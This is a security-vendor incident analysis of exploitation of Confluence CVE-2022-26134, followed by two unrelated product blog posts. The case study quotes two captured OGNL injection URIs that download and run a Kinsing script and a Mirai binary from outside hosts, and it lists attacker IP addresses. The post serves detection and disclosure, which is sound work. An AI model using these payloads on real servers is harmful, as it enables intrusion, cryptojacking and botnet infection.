Blog
/
/
June 12, 2022

Confluence CVE-2022-26134 Zero-Day: Detection & Guidance

Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
12
Jun 2022
Stay informed with Darktrace's blog on detection and guidance for the Confluence CVE-2022-26134 zero-day vulnerability. Learn how to protect your systems.

Summary

  • CVE-2022-26134 is an unauthenticated OGNL injection vulnerability which allows threat actors to execute arbitrary code on Atlassian Confluence Server or Data Centre products (not Cloud).
  • Atlassian has released several patches and a temporary mitigation in their security advisory. This has been consistently updated since the emergence of the vulnerability.
  • Darktrace detected and responded to an instance of exploitation in the first weekend of widespread exploits of this CVE.

Introduction

Looking forwards to 2022, the security industry expressed widespread concerns around third-party exposure and integration vulnerabilities.[1] Having already seen a handful of in-the-wild exploits against Okta (CVE-2022-22965) and Microsoft (CVE-2022-30190), the start of June has now seen another critical remote code execution (RCE) vulnerability affecting Atlassian’s Confluence range. Confluence is a popular wiki management and knowledge-sharing platform used by enterprises worldwide. This latest vulnerability (CVE-2022-26134) affects all versions of Confluence Server and Data Centre.[2] This blog will explore the vulnerability itself, an instance which Darktrace detected and responded to, and additional guidance for both the public at large and existing Darktrace customers.

Exploitation of this CVE occurs through an injection vulnerability which enables threat actors to execute arbitrary code without authentication. Injection-type attacks work by sending data to web applications in order to cause unintended results. In this instance, this involves injecting OGNL (Object-Graph Navigation Language) expressions to Confluence server memory. This is done by placing the expression in the URI of a HTTP request to the server. Threat actors can then plant a webshell which they can interact with and deploy further malicious code, without having to re-exploit the server. It is worth noting that several proofs-of-concept of this exploit have also been seen online.[3] As a widely known and critical severity exploit, it is being indiscriminately used by a range of threat actors.[4]

Atlassian advises that sites hosted on Confluence Cloud (run via AWS) are not vulnerable to this exploit and it is restricted to organizations running their own Confluence servers.[2]

Case study: European media organization

The first detected in-the-wild exploit for this zero-day was reported to Atlassian as an out-of-hours attack over the US Memorial Day weekend.[5] Darktrace analysts identified a similar instance of this exploit only a couple of days later within the network of a European media provider. This was part of a wider series of compromises affecting the account, likely involving multiple threat actors. The timing was also in line with the start of more widespread public exploitation attempts against other organizations.[6]

On the evening of June 3, Darktrace’s Enterprise Immune System identified a new text/x-shellscript download for the curl/7.61.1 user agent on a company’s Confluence server. This originated from a rare external IP address, 194.38.20[.]166. It is possible that the initial compromise came moments earlier from 95.182.120[.]164 (a suspicious Russian IP) however this could not be verified as the connection was encrypted. The download was shortly followed by file execution and outbound HTTP involving the curl agent. A further download for an executable from 185.234.247[.]8 was attempted but this was blocked by Antigena Network’s Autonomous Response. Despite this, the Confluence server then began serving sessions using the Minergate protocol on a non-standard port. In addition to mining, this was accompanied by failed beaconing connections to another rare Russian IP, 45.156.23[.]210, which had not yet been flagged as malicious on VirusTotal OSINT (Figures 1 and 2).[7][8]

Figures 1 and 2: Unrated VirusTotal pages for Russian IPs connected to during minergate activity and failed beaconing — Darktrace identification of these IP’s involvement in the Confluence exploit occurred prior to any malicious ratings being added to the OSINT profiles

Minergate is an open crypto-mining pool allowing users to add computer hashing power to a larger network of mining devices in order to gain digital currencies. Interestingly, this is not the first time Confluence has had a critical vulnerability exploited for financial gain. September 2021 saw CVE-2021-26084, another RCE vulnerability which was also taken advantage of in order to install crypto-miners on unsuspecting devices.[9]

During attempted beaconing activity, Darktrace also highlighted the download of two cf.sh files using the initial curl agent. Further malicious files were then downloaded by the device. Enrichment from VirusTotal (Figure 3) alongside the URIs, identified these as Kinsing shell scripts.[10][11] Kinsing is a malware strain from 2020, which was predominantly used to install another crypto-miner named ‘kdevtmpfsi’. Antigena triggered a Suspicious File Block to mitigate the use of this miner. However, following these downloads, additional Minergate connection attempts continued to be observed. This may indicate the successful execution of one or more scripts.

Figure 3: VirusTotal confirming evidence of Kinsing shell download

More concrete evidence of CVE-2022-26134 exploitation was detected in the afternoon of June 4. The Confluence Server received a HTTP GET request with the following URI and redirect location:

/${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash’).start()”)}/

This is a likely demonstration of the OGNL injection attack (Figures 3 and 4). The ‘nashorn’ string refers to the Nashorn Engine which is used to interpret javascript code and has been identified within active payloads used during the exploit of this CVE. If successful, a threat actor could be provided with a reverse shell for ease of continued connections (usually) with fewer restrictions to port usage.[12] Following the injection, the server showed more signs of compromise such as continued crypto-mining and SSL beaconing attempts.

Figures 4 and 5: Darktrace Advanced Search features highlighting initial OGNL injection and exploit time

Following the injection, a separate exploitation was identified. A new user agent and URI indicative of the Mirai botnet attempted to utilise the same Confluence vulnerability to establish even more crypto-mining (Figure 6). Mirai itself may have also been deployed as a backdoor and a means to attain persistency.

Figure 6: Model breach snapshot highlighting new user agent and Mirai URI

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}/

Throughout this incident, Darktrace’s Proactive Threat Notification service alerted the customer to both the Minergate and suspicious Kinsing downloads. This ensured dedicated SOC analysts were able to triage the events in real time and provide additional enrichment for the customer’s own internal investigations and eventual remediation. With zero-days often posing as a race between threat actors and defenders, this incident makes it clear that Darktrace detection can keep up with both known and novel compromises.

A full list of model detections and indicators of compromise uncovered during this incident can be found in the appendix.

Darktrace coverage and guidance

From the Kinsing shell scripts to the Nashorn exploitation, this incident showcased a range of malicious payloads and exploit methods. Although signature solutions may have picked up the older indicators, Darktrace model detections were able to provide visibility of the new. Models breached covering kill chain stages including exploit, execution, command and control and actions-on-objectives (Figure 7). With the Enterprise Immune System providing comprehensive visibility across the incident, the threat could be clearly investigated or recorded by the customer to warn against similar incidents in the future. Several behaviors, including the mass crypto-mining, were also grouped together and presented by AI Analyst to support the investigation process.

Figure 7: Device graph showing a cluster of model breaches on the Confluence Server around the exploit event

On top of detection, the customer also had Antigena in active mode, ensuring several malicious activities were actioned in real time. Examples of Autonomous Response included:

  • Antigena / Network / External Threat / Antigena Suspicious Activity Block
  • Block connections to 176.113.81[.]186 port 80, 45.156.23[.]210 port 80 and 91.241.19[.]134 port 80 for one hour
  • Antigena / Network / External Threat / Antigena Suspicious File Block
  • Block connections to 194.38.20[.]166 port 80 for two hours
  • Antigena / Network / External Threat / Antigena Crypto Currency Mining Block
  • Block connections to 176.113.81[.]186 port 80 for 24 hours

Darktrace customers can also maximise the value of this response by taking the following steps:

  • Ensure Antigena Network is deployed.
  • Regularly review Antigena breaches and set Antigena to ‘Active’ rather than ‘Human Confirmation’ mode (otherwise customers’ security teams will need to manually trigger responses).
  • Tag Confluence Servers with Antigena External Threat, Antigena Significant Anomaly or Antigena All tags.
  • Ensure Antigena has appropriate firewall integrations.

For each of these steps, more information can be found in the product guides on our Customer Portal

Wider recommendations for CVE-2022-26134

On top of Darktrace product guidance, there are several encouraged actions from the vendor:

  • Atlassian recommends updates to the following versions where this vulnerability has been fixed: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.
  • For those unable to update, temporary mitigations can be found in the formal security advisory.
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.

Appendix

Darktrace model detections (for the discussed incident)

  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous File / EXE from Rare External Location
  • Anomalous File / Script from Rare External
  • Anomalous Server Activity / Possible Denial of Service Activity
  • Anomalous Server Activity / Rare External from Server
  • Compromise / Crypto Currency Mining Activity
  • Compromise / High Volume of Connections with Beacon Score
  • Compromise / Large Number of Suspicious Failed Connections
  • Compromise / SSL Beaconing to Rare Destination
  • Device / New User Agent

IoCs

Thanks to Hyeongyung Yeom and the Threat Research Team for their contributions.

Footnotes

1. https://www.gartner.com/en/articles/7-top-trends-in-cybersecurity-for-2022

2. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. https://twitter.com/phithon_xg/status/1532887542722269184?cxt=HHwWgMCoiafG9MUqAAAA

4. https://twitter.com/stevenadair/status/1532768372911398916

5. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

6. https://www.cybersecuritydive.com/news/attackers-atlassian-confluence-zero-day-exploit/625032

7. https://www.virustotal.com/gui/ip-address/45.156.23.210

8. https://www.virustotal.com/gui/ip-address/176.113.81.186

9. https://securityboulevard.com/2021/09/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers

10. https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

11. https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d

12. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Author
Gabriel Few-Wiegratz
Product Marketing Manager, Exposure Management and Incident Readiness
Watch the NIS2 Webinar
Book a 1-1 meeting with one of our experts
Get in touch
Share this article
Trending blogs
1
Our Annual Survey Reveals How Security Teams Are Adapting to AI-Powered Threats
Mar 4, 2025
2
Darktrace Releases Annual 2024 Threat Insights
Feb 19, 2025
3
From Hype to Reality: How AI is Transforming Cybersecurity Practices
Feb 10, 2025
4
From Containment to Remediation: Darktrace / CLOUD & Cado Reducing MTTR
Mar 6, 2025
5
RansomHub Ransomware: Darktrace’s Investigation of the Newest Tool in ShadowSyndicate's Arsenal
Jan 14, 2025

More in this series

No items found.

Blog

/

Cloud

/

April 2, 2025

Fusing Vulnerability and Threat Data: Enhancing the Depth of Attack Analysis

Default blog imageDefault blog image

Cado Security, recently acquired by Darktrace, is excited to announce a significant enhancement to its data collection capabilities, with the addition of a vulnerability discovery feature for Linux-based cloud resources. According to Darktrace’s Annual Threat Report 2024, the most significant campaigns observed in 2024 involved the ongoing exploitation of significant vulnerabilities in internet-facing systems. Cado’s new vulnerability discovery capability further deepens its ability to provide extensive context to security teams, enabling them to make informed decisions about threats, faster than ever.

Deep context to accelerate understanding and remediation

Context is critical when understanding the circumstances surrounding a threat. It can also take many forms – alert data, telemetry, file content, business context (for example asset criticality, core function of the resource), and risk context, such as open vulnerabilities.

When performing an investigation, it is common practice to understand the risk profile of the resource impacted, specifically determining open vulnerabilities and how they may relate to the threat. For example, if an analyst is triaging an alert related to an internet-facing Webserver running Apache, it would greatly benefit the analyst to understand open vulnerabilities in the Apache version that is running, if any of them are exploitable, whether a fix is available, etc. This dataset also serves as an invaluable source when developing a remediation plan, identifying specific vulnerabilities to be prioritised for patching.

Data acquisition in Cado

Cado is the only platform with the ability to perform full forensic captures as well as utilize instant triage collection methods, which is why fusing host-based artifact data with vulnerability data is such an exciting and compelling development.

The vulnerability discovery feature can be run as part of an acquisition – full or triage – as well as independently using a fast ‘Scan only’ mode.

Figure 1: A fast vulnerability scan being performed on the acquired evidence

Once the acquisition has completed, the user will have access to a ‘Vulnerabilities’ table within their investigation, where they are able to view and filter open vulnerabilities (by Severity, CVE ID, Resource, and other properties), as well as pivot to the full Event Timeline. In the Event Timeline, the user will be able to identify whether there is any malicious, suspicious or other interesting activity surrounding the vulnerable package, given the unified timeline presents a complete chronological dataset of all evidence and context collected.

Figure 2: Vulnerabilities discovered on the acquired evidence
Figure 3: Pivot from the Vulnerabilities table to the Event Timeline provides an in-depth view of file and process data associated with the vulnerable package selected. In this example, Apache2.

Future work

In the coming months, we’ll be releasing initial versions of highly anticipated integrations between Cado and Darktrace, including the ability to ingest Darktrace / CLOUD alerts which will automatically trigger a forensic capture (as well as a vulnerability discovery) of the impacted assets.

To learn more about how Cado and Darktrace will combine forces, request a demo today.

Continue reading
About the author
Paul Bottomley
Director of Product Management, Cado

Blog

/

OT

/

March 28, 2025

Darktrace Recognized as the Only Visionary in the 2025 Gartner® Magic Quadrant™ for CPS Protection Platforms

Default blog imageDefault blog image

We are thrilled to announce that Darktrace has been named the only Visionary in the inaugural Gartner® Magic Quadrant™ for Cyber-Physical Systems (CPS) Protection Platforms. We feel This recognition highlights Darktrace’s AI-driven approach to securing industrial environments, where conventional security solutions struggle to keep pace with increasing cyber threats.

A milestone for CPS security

It's our opinion that the first-ever Gartner Magic Quadrant for CPS Protection Platforms reflects a growing industry shift toward purpose-built security solutions for critical infrastructure. As organizations integrate IT, OT, and cloud-connected systems, the cyber risk landscape continues to expand. Gartner evaluated 17 vendors based on their Ability to Execute and Completeness of Vision, establishing a benchmark for security leaders looking to enhance cyber resilience in industrial environments.

We believe the Gartner recognition of Darktrace as the only Visionary reaffirms the platform’s ability to proactively defend against cyber risks through AI-driven anomaly detection, autonomous response, and risk-based security strategies. With increasingly sophisticated attacks targeting industrial control systems, organizations need a solution that continuously evolves to defend against both known and unknown threats.

AI-driven security for CPS environments

Securing CPS environments requires an approach that adapts to the dynamic nature of industrial operations. Traditional security tools rely on static signatures and predefined rules, leaving gaps in protection against novel and sophisticated threats. Darktrace / OT takes a different approach, leveraging Self-Learning AI to detect and neutralize threats in real time, even in air-gapped or highly regulated environments.

Darktrace / OT continuously analyzes network behaviors to establish a deep understanding of what is “normal” for each industrial environment. This enables it to autonomously identify deviations that signal potential cyber threats, providing early warning and proactive defense before attacks can disrupt operations. Unlike rule-based security models that require constant manual updates, Darktrace / OT improves with the environment, ensuring long-term resilience against emerging cyber risks.

Bridging the IT-OT security gap

A major challenge for organizations protecting CPS environments is the disconnect between IT and OT security. While IT security has traditionally focused on data

protection and compliance, OT security is driven by operational uptime and safety, leading to siloed security programs that leave critical gaps in visibility and response.

Darktrace / OT eliminates these silos by providing unified visibility across IT, OT, and IoT assets, ensuring that security teams have a complete picture of their attack surface. Its AI-driven approach enables cross-domain threat detection, recognizing risks that move laterally between IT and OT environments. By seamlessly integrating with existing security architectures, Darktrace / OT helps organizations close security gaps without disrupting industrial processes.

Proactive OT risk management and resilience

Beyond detection and response, Darktrace / OT strengthens organizations’ ability to manage cyber risk proactively. By mapping vulnerabilities to real-world attack paths, it prioritizes remediation actions based on actual exploitability and business impact, rather than relying on isolated CVE scores. This risk-based approach enables security teams to focus resources where they matter most, reducing overall exposure to cyber threats.

With autonomous threat response capabilities, Darktrace / OT not only identifies risks but also contains them in real time, preventing attackers from escalating intrusions. Whether mitigating ransomware, insider threats, or sophisticated nation-state attacks, Darktrace / OT ensures that industrial environments remain secure, operational, and resilient, no matter how threats evolve.

AI-powered incident response and SOC automation

Security teams are facing an overwhelming volume of alerts, making it difficult to prioritize threats and respond effectively. Darktrace / OT’s Cyber AI Analyst acts as a force multiplier for security teams by automating threat investigation, alert triage, and response actions. By mimicking the workflow of a human SOC analyst, Cyber AI Analyst provides contextual insights that accelerate incident response and reduce the manual workload on security teams.

With 24/7 autonomous monitoring, Darktrace / OT ensures that threats are continuously detected and investigated in real time. Whether facing ransomware, insider threats, or sophisticated nation-state attacks, organizations can rely on AI-driven security to contain threats before they disrupt operations.

Trusted by customers: Darktrace / OT recognized in Gartner Peer Insights

Source: Gartner Peer Insights (Oct 28th)

Beyond our recognition in the Gartner Magic Quadrant, we feel Darktrace / OT is one of the highest-rated CPS security solutions on Gartner Peer Insights, reflecting strong customer trust and validation. With a 4.9/5 overall rating and the highest "Willingness to Recommend" score among CPS vendors, organizations across critical infrastructure and industrial sectors recognize the impact of our AI-driven security approach. Source: Gartner Peer Insights (Oct 28th)

This strong customer endorsement underscores why leading enterprises trust Darktrace / OT to secure their CPS environments today and in the future.

Redefining the future of CPS security

It's our view that Darktrace’s recognition as the only Visionary in the Gartner Magic Quadrant for CPS Protection Platforms validates its leadership in next-generation industrial security. As cyber threats targeting critical infrastructure continue to rise, organizations must adopt AI-driven security solutions that can adapt, respond, and mitigate risks in real time.

We believe this recognition reinforces our commitment to innovation and our mission to secure the world’s most essential systems. This recognition reinforces our commitment to innovation and our mission to secure the world’s most essential systems.

® Download the full Gartner Magic Quadrant for CPS Protection Platforms

® Request a demo to see Darktrace OT in action.

Gartner, Magic Quadrant for CPS Protection Platforms , Katell Thielemann, Wam Voster, Ruggero Contu 12 February 2025

Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

GARTNER is a registered trademark and service mark of Gartner and Magic Quadrant and Peer Insights are a registered trademark, of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences with the vendors listed on the platform, should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

Continue reading
About the author
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
Your data. Our AI.
Elevate your network security with Darktrace AI